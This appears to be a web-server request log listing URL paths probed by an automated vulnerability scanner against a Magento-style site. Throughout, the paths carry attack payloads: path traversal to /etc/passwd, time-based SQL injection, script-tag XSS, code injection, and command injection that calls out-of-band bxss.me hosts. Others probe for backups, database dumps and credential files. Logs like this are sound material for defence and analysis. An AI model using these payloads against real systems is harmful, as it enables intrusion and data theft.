/acc9745608/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/giftmessage.js 1 https://104.36.149.61/
/login.php 1 -
/aeGfVpJl'%20OR%20245=(SELECT%20245%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/%3b(nslookup%20hitwsxiognarc2be4e.bxss.me||perl%20-e%20\"gethostbyname('hitwsxiognarc2be4e.bxss.me')\")|(nslookup%20hitwsxiognarc2be4e.bxss.me||perl%20-e%20\"gethostbyname('hitwsxiognarc2be4e.bxss.me')\")&(nslookup%20hitwsxiognarc2be4e.bxss.me||perl%2 1 -
/acc/skin/1some_inexistent_file_with_long_name%00.jpg/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/skin/adminhtml/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/cgi-bin/.gitlab-ci.yml 1 -
/'\"/index.php/install/wizard/config/ 1 -
/acc/'\"()&%25<acx><ScRiPt%20>ll2Q(9313)<%2fScRiPt>/prototype/prototype.js 1 https://104.36.149.61/
//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd 3 -
/acc/skin/install/default/default/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/image.js 1 -
/`(nslookup%20hitjgnhwrbkkgf556b.bxss.me||perl%20-e%20\"gethostbyname('hitjgnhwrbkkgf556b.bxss.me')\")`/js/prototype/ 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/hash.js 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/skin/install/default/default/%3b(nslookup%20hitvaxzptclnz43659.bxss.me||perl%20-e%20\"gethostbyname('hitvaxzptclnz43659.bxss.me')\")|(nslookup%20hitvaxzptclnz43659.bxss.me||perl%20-e%20\"gethostbyname('hitvaxzptclnz43659.bxss.me')\")&(nslookup%20hitva 1 -
/acc/js/mage/1%00%c0%a7%c0%a2%252527%252522/image.js 1 https://104.36.149.61/
/wp-content/themes/twentyfifteen/genericons/example.html 1 -
/<!--/js/prototype/ 1 -
/'.print(md5(31337)).'/skin/install/default/default/css/iestyles.css 1 -
/'\"/js/prototype/windows/themes/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/skin/install/default/ 1 -
/'+response.write(9154441*9534260)+'/skin/install/default/default/css/ie7minus.css 1 -
/${@print(md5(31337))}\\/skin/adminhtml/default/ 1 -
/phpMyAdmin/main.php 1 -
/cgi-bin/pom.xml 1 -
/cgi-bin/credentials.xml 1 -
/%2fxfs.bxss.me/js/mage/adminhtml/sales/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/prototype/validation.js 1 https://104.36.149.61/
/acc/skin/install/1%00%c0%a7%c0%a2%252527%252522/default/css/boxes.css 1 https://104.36.149.61/
/`(nslookup%20hitsotxofvqknba343.bxss.me||perl%20-e%20\"gethostbyname('hitsotxofvqknba343.bxss.me')\")`/js/mage/adminhtml/product/ 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/web-console/Invoker 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'd59c'!='d59c%25/js/mage/ 1 https://104.36.149.61/
/${9999090+9999220}/js/mage/adminhtml/browser.js 1 -
/acc/index.php/install/wizard/locale/..%2f..%2fGemfile 1 -
/acc/index.php/install/..%2f..%2f..%2f..%2f..%2fGemfile 1 -
/'%3bprint(md5(31337))%3b$a='/js/varien/form.js 1 -
/PtxDG8R7'))%20OR%20410=(SELECT%20410%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/solr/admin/ 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20's9Hz'!='s9Hz%25/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/dump.zip 1 -
/\"+response.write(9455979*9095726)+\"/skin/adminhtml/ 1 -
/-1%20OR%203+492-492-1=0+0+0+1/js/mage/adminhtml/ 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/skin/install/default/default/ 1 https://104.36.149.61/
/acc%25'%20AND%202*3*8=6*8%20AND%20'78TP'!='78TP%25/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/scriptaculous/effects.js 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/windows/ 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/|echo%20xbyjnj$()\\%20jbbcry\\nz^xyu||a%20%23'%20|echo%20xbyjnj$()\\%20jbbcry\\nz^xyu||a%20%23|\"%20|echo%20xbyjnj$()\\%20jbbcry\\nz^xyu||a%20%23/skin/install/default/default/css/ie7minus.css 1 -
/-1%20OR%203+405-405-1=0+0+0+1/js/mage/translate.js 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(101).concat(89).concat(108).concat(80)+(require\"socket\"%0aSocket.gethostbyname(\"hitpw\"+\"uycjkjgz4ca84.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/backup.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/accordion.js 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/prototype/validation.js 1 -
/acc/index.php//../../../../../../../../windows/win.ini%C0%80.jsp 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>q8Xa(9975)<%2fScRiPt>/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc9236426/js/prototype/prototype.js 1 https://104.36.149.61/
//../../../../../../../../etc/passwd%00en 1 -
/%3b(nslookup%20hitiziucsdzftdabef.bxss.me||perl%20-e%20\"gethostbyname('hitiziucsdzftdabef.bxss.me')\")|(nslookup%20hitiziucsdzftdabef.bxss.me||perl%20-e%20\"gethostbyname('hitiziucsdzftdabef.bxss.me')\")&(nslookup%20hitiziucsdzftdabef.bxss.me||perl%20-e% 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/prototype/tooltip.js 1 https://104.36.149.61/
/acc/js/ 400 https://www.google.com/search
/WEB-INF/web.xml~ 1 -
/acc/js/..%2fmage/adminhtml/hash.js 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(113).concat(80).concat(107).concat(85)+(require'socket'%0aSocket.gethostbyname('hithe'+'faigkopw67fc6.bxss.me.')[3].to_s)+'/js/mage/adminhtml/backup.js 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/$(nslookup%20hitvteliknklm11f7c.bxss.me||perl%20-e%20\"gethostbyname('hitvteliknklm11f7c.bxss.me')\")/js/prototype/validation.js 1 -
/acc/index.php/%2fxfs.bxss.me/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/adminhtml/default/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/prototype/ 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/validation.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>gf47(9652)<%2fScRiPt>/js/mage/adminhtml/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/dump.sql.tar 1 -
/admin/mysql/main.php 1 -
/)/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/(nslookup%20hitryorxglvlrf0796.bxss.me||perl%20-e%20\"gethostbyname('hitryorxglvlrf0796.bxss.me')\")/js/mage/adminhtml/form.js 1 -
/acc/bxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/flexuploader.js 1 -
/'\"/skin/install/default/default/css/iestyles.css 1 -
/acc//mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/bxss.me/skin/install/default/default/ 1 https://104.36.149.61/
/|echo%20cbqmlp$()\\%20mzwxey\\nz^xyu||a%20%23'%20|echo%20cbqmlp$()\\%20mzwxey\\nz^xyu||a%20%23|\"%20|echo%20cbqmlp$()\\%20mzwxey\\nz^xyu||a%20%23/skin/adminhtml/default/ 1 -
/plugins/tiny_mce 1 -
/assets/%2f 1 -
/acc/.%2fjs/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/shells 1 -
/dbdump.tar.gz 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/install/default/ 1 https://104.36.149.61/
/|(nslookup%20hithxuxluoqai5b83b.bxss.me||perl%20-e%20\"gethostbyname('hithxuxluoqai5b83b.bxss.me')\")/js/prototype/prototype.js 1 -
/acc/index.php/install/wizard/..%2fpackage-lock.json 1 -
/Gulpfile.js 1 -
/acc/index.php/install//../../../../../../../../etc/passwd%00 1 -
/if(now()=sysdate(),sleep(15),0)/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/js/varien/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd.js 1 https://104.36.149.61/
/acc/skin/adminhtml<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/default/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/varien/form.js 1 https://104.36.149.61/
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/index.php/install/ 1 -
/plugins/servlet/oauth/users/icon-uri 1 -
/acc/skin<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/default/default/css/iestyles.css 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/form.js 1 https://104.36.149.61/
/3T9otDbG')%20OR%20420=(SELECT%20420%20FROM%20PG_SLEEP(15))--/js/prototype/prototype.js 1 https://104.36.149.61/
/docker-compose.yaml 1 -
/UEgFtdRA'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/windows/ 1 https://104.36.149.61/
/console/ 26 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/adminhtml/grid.js 1 https://104.36.149.61/
/$(nslookup%20hitputmvuybfve946c.bxss.me||perl%20-e%20\"gethostbyname('hitputmvuybfve946c.bxss.me')\")/js/mage/ 1 -
/104.36.149.61-backup.zip 1 -
/&echo%20xcvbhq$()\\%20xaywgr\\nz^xyu||a%20%23'%20&echo%20xcvbhq$()\\%20xaywgr\\nz^xyu||a%20%23|\"%20&echo%20xcvbhq$()\\%20xaywgr\\nz^xyu||a%20%23/skin/install/default/default/css/iestyles.css 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/browser.js 1 -
/Http://bxss.me/t/fit.txt/skin/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/mage/1some_inexistent_file_with_long_name%00.jpg/accordion.js 1 https://104.36.149.61/
//%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af%c0%af%c0%af..%c0%af%c0%af 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/events.js 1 -
/owa/auth.owa 3 -
/bxss.me/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>QlCt(9918)<%2fScRiPt>/adminhtml/accordion.js 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"ieux\"=\"ieux/js/mage/ 1 https://104.36.149.61/
/dbdump.zip 1 -
/acc/index.php/install//././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ 2 -
//%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af/windows/win.ini 1 -
/'.gethostbyname(lc('hitab'.'vezzvzyi870b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(87).chr(103).chr(80).'/skin/adminhtml/ 1 -
/acc/index.php/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/wizard/config/ 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/skin/frontend/ 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>QEM2(9060)<%2fScRiPt>/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/image.js 1 https://104.36.149.61/
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>XkUp(9538)<%2fScRiPt>/uploader/ 1 https://104.36.149.61/
/acc/var/.htaccess 1 -
/acc/index.php//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215windows/win.ini 1 -
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/acc/index.php/install/wizard<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/locale/ 1 -
/^(%23$!@%23$)(()))******/js/mage/ 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'1PuF'='1PuF/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/'\"()&%25<acx><ScRiPt%20>JVyg(9958)<%2fScRiPt>/adminhtml/backup.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/prototype/prototype.js 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>Lssw(9879)<%2fScRiPt>/install/default/default/ 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/product/ 1 https://104.36.149.61/
/FZDnzNZI'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/prototype/ 1 https://104.36.149.61/
/acc/'\"()&%25<acx><ScRiPt%20>6DR8(9148)<%2fScRiPt>/install/wizard/locale/ 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/ 1 -
/1FX8t7IEO/js/mage/adminhtml/accordion.js 1 -
/${@print(md5(31337))}\\/js/mage/adminhtml/accordion.js 1 -
/acc/index.php/install/wizard/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"XgSh\"=\"XgSh/index.php/install/wizard/config/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/frontend/ 1 https://104.36.149.61/
/response.write(9177626*9035729)/js/mage/adminhtml/hash.js 1 -
/acc/index.php/install/wizard/locale/..%2f..%2fweb.config 1 -
/acc/skin/install/default/%3b(nslookup%20hitbxhddqthlpef086.bxss.me||perl%20-e%20\"gethostbyname('hitbxhddqthlpef086.bxss.me')\")|(nslookup%20hitbxhddqthlpef086.bxss.me||perl%20-e%20\"gethostbyname('hitbxhddqthlpef086.bxss.me')\")&(nslookup%20hitbxhddqthlp 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/\".gethostbyname(lc(\"hitco\".\"xtiwleap9e757.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(109).chr(82).chr(114).chr(80).\"/skin/install/default/default/css/clears.css 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/varien/form.js 1 -
/CMSPages/Staging/syncserver.asmx 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/install/default/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/adminhtml/default/ 1 https://104.36.149.61/
/${10000013+10000016}/js/mage/adminhtml/ 1 -
/acc/.%2fjs/mage/adminhtml/form.js 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/product/ 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'ykWn'='ykWn/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/js/scriptaculous/1some_inexistent_file_with_long_name%00.jpg.js 1 https://104.36.149.61/
/acc/index.php/../../package.json 1 -
/igz2M5mE/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.php/install/wizard/locale/ 1 https://104.36.149.61/
/104.tgz 1 -
/gruntFile.js 1 -
/@@VvA9U/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
//db.inc 1 -
/${9999330+9999205}/js/prototype/extended_debug.js 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/uploader/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hityg'.'mernzqlh1a497.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(68).chr(120).chr(77).'/js/varien/form.js 1 -
/sdk/../../../../../../../../../../../../../etc/passwd 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/varien/js.js 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"8WbM\"=\"8WbM/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/skin/install/default/.%2fdefault/css/clears.css 1 https://104.36.149.61/
/uau8IkSk'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/.psql_history 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/tooltip.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost//........................................................................../../../../../../../../etc/passwd 1 -
/.%2facc/js/mage/adminhtml/ 1 https://104.36.149.61/
/-1%20OR%203+616-616-1=0+0+0+1/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/web.config.i18n.ashx 1 -
/acc/js/mage/adminhtml/moneybookers.js/979620%40 1 https://104.36.149.61/
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/adminhtml/flexuploader.js 1 -
//owa/auth/logon.aspx 1 -
/hHY9j7PF'))%20OR%20490=(SELECT%20490%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/acc/skin/bxss.me%2ft%2fxss.html%3f%2500/default/default/css/clears.css 1 -
/%3b(nslookup%20hitpozgghtyzhdf87e.bxss.me||perl%20-e%20\"gethostbyname('hitpozgghtyzhdf87e.bxss.me')\")|(nslookup%20hitpozgghtyzhdf87e.bxss.me||perl%20-e%20\"gethostbyname('hitpozgghtyzhdf87e.bxss.me')\")&(nslookup%20hitpozgghtyzhdf87e.bxss.me||perl%20-e% 1 -
/acc/js/%2fxfs.bxss.me/tooltip.js 1 -
/acc/js/%2fxfs.bxss.me/adminhtml/browser.js 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/prototype.js 1 https://104.36.149.61/
//%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/windows/win.ini 1 -
/'\"/js/mage/adminhtml/image.js 1 -
/staticfiles/phpThumb/phpThumb.php 1 -
/.hg/requires 1 -
/(nslookup%20hityifonnbqkxe49c1.bxss.me||perl%20-e%20\"gethostbyname('hityifonnbqkxe49c1.bxss.me')\")/skin/frontend/ 1 -
/acc/js/prototype/..%2fwindows/ 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/104.36.149.61_db.tgz 1 -
/.well-known/acme-challenge/<68741116> 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/giftoptions/ 1 -
/|echo%20uebhgz$()\\%20dcudhk\\nz^xyu||a%20%23'%20|echo%20uebhgz$()\\%20dcudhk\\nz^xyu||a%20%23|\"%20|echo%20uebhgz$()\\%20dcudhk\\nz^xyu||a%20%23/skin/install/default/default/css/boxes.css 1 -
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/104db.sql.gz 1 -
/manager/html 1 -
/NCeomSRy'%20OR%20248=(SELECT%20248%20FROM%20PG_SLEEP(15))--/js/varien/form.js 1 https://104.36.149.61/
/'\"()&%25<acx><ScRiPt%20>JN5X(9680)<%2fScRiPt>/js/prototype/windows/ 1 https://104.36.149.61/
//localconfig.inc 1 -
/acc/js/..%2fvarien/js.js 1 https://104.36.149.61/
/`(nslookup%20hitpweuhdcxdf6452e.bxss.me||perl%20-e%20\"gethostbyname('hitpweuhdcxdf6452e.bxss.me')\")`/js/mage/adminhtml/giftoptions/ 1 -
/`(nslookup%20hitfsgiotsxqm18899.bxss.me||perl%20-e%20\"gethostbyname('hitfsgiotsxqm18899.bxss.me')\")`/js/prototype/extended_debug.js 1 -
/bxss.me/js/prototype/extended_debug.js 1 https://104.36.149.61/
/theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/windows/ 1 -
/acc/js/mage/bxss.me%2ft%2fxss.html%3f%2500/product/ 1 -
/host-manager/text/ 1 -
/acc/js/mage/adminhtml'\"()&%25<acx><ScRiPt%20>IUUR(9207)<%2fScRiPt>/giftmessage.js 1 https://104.36.149.61/
/|(nslookup%20hitzobfsogwuj9f205.bxss.me||perl%20-e%20\"gethostbyname('hitzobfsogwuj9f205.bxss.me')\")/js/mage/adminhtml/browser.js 1 -
/'\"()&%25<acx><ScRiPt%20>XkUp(9823)<%2fScRiPt>/js/mage/adminhtml/uploader/ 1 https://104.36.149.61/
/acc/index.php/install//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini 2 -
/static\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shells 1 -
/pages/doenterpagevariables.action 1 -
/1'\"/js/prototype/tooltip.js 1 https://104.36.149.61/
/hM9BsTPg'))%20OR%20713=(SELECT%20713%20FROM%20PG_SLEEP(15))--/js/prototype/ 1 https://104.36.149.61/
/cgi-bin/Guardfile 1 -
/acc/index.php/install/wizard/locale/..%2f..%2fpackage-lock.json 1 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/debug.js 1 https://104.36.149.61/
/pi.php 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc/.%2fskin/install/default/default/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config//../../../../../../../../../../../../../../../..//etc/passwd 1 -
/acc/js'\"()&%25<acx><ScRiPt%20>JVyg(9607)<%2fScRiPt>/mage/adminhtml/backup.js 1 https://104.36.149.61/
/!(()&&!|*|*|/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/104_backup.tar.gz 1 -
/acc\"%20AND%202*3*8=6*8%20AND%20\"7bhm\"=\"7bhm/index.php/install/wizard/locale/ 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/web/database/manager 1 -
/acc/js/./WEB-INF/web.xml%00.jsp 2 -
/acc/index.php/bxss.me%2ft%2fxss.html%3f%2500/ 1 -
/KpH5KIax/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/js/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/adminhtml/backup.js 1 https://104.36.149.61/
/<!--/index.php/install/wizard/config/ 1 -
/1'\"/js/prototype/debug.js 1 https://104.36.149.61/
//%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\windows/win.ini 1 -
/&(nslookup%20hitzppucvoqjma9f8c.bxss.me||perl%20-e%20\"gethostbyname('hitzppucvoqjma9f8c.bxss.me')\")&'\\\"`0&(nslookup%20hitzppucvoqjma9f8c.bxss.me||perl%20-e%20\"gethostbyname('hitzppucvoqjma9f8c.bxss.me')\")&`'/js/prototype/prototype.js 1 -
/echo%20ohwhqh$()\\%20lepfid\\nz^xyu||a%20%23'%20&echo%20ohwhqh$()\\%20lepfid\\nz^xyu||a%20%23|\"%20&echo%20ohwhqh$()\\%20lepfid\\nz^xyu||a%20%23/skin/install/default/default/css/iestyles.css 1 -
/<!--/js/mage/adminhtml/uploader/ 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/sales/ 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/skin/adminhtml/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/ 1 https://104.36.149.61/
/axis1/services/listServices 1 -
/%3b(nslookup%20hitfvdqmlznmg03e03.bxss.me||perl%20-e%20\"gethostbyname('hitfvdqmlznmg03e03.bxss.me')\")|(nslookup%20hitfvdqmlznmg03e03.bxss.me||perl%20-e%20\"gethostbyname('hitfvdqmlznmg03e03.bxss.me')\")&(nslookup%20hitfvdqmlznmg03e03.bxss.me||perl%20-e% 1 -
/acc/skin/1%00%c0%a7%c0%a2%252527%252522/default/default/css/boxes.css 1 https://104.36.149.61/
//../../../../../../../../etc/passwd 2 -
/backup_104.sql 1 -
/@@ZXn3X/js/prototype/debug.js 1 https://104.36.149.61/
/\"%3bprint(md5(31337))%3b$a=\"/skin/adminhtml/ 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/prototype/ 1 https://104.36.149.61/
/&echo%20cstekc$()\\%20rjogdq\\nz^xyu||a%20%23'%20&echo%20cstekc$()\\%20rjogdq\\nz^xyu||a%20%23|\"%20&echo%20cstekc$()\\%20rjogdq\\nz^xyu||a%20%23/index.php/install/wizard/config/ 1 -
/(nslookup%20hitzjfbzkjaeqb8607.bxss.me||perl%20-e%20\"gethostbyname('hitzjfbzkjaeqb8607.bxss.me')\")/js/mage/adminhtml/product/ 1 -
/\"%3bprint(md5(31337))%3b$a=\"/skin/adminhtml/default/ 1 -
/javascript/editors/fckeditor 2 -
/acc'||'/skin/frontend/ 1 https://104.36.149.61/
/mNVZwaCT'%20OR%20279=(SELECT%20279%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/)/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
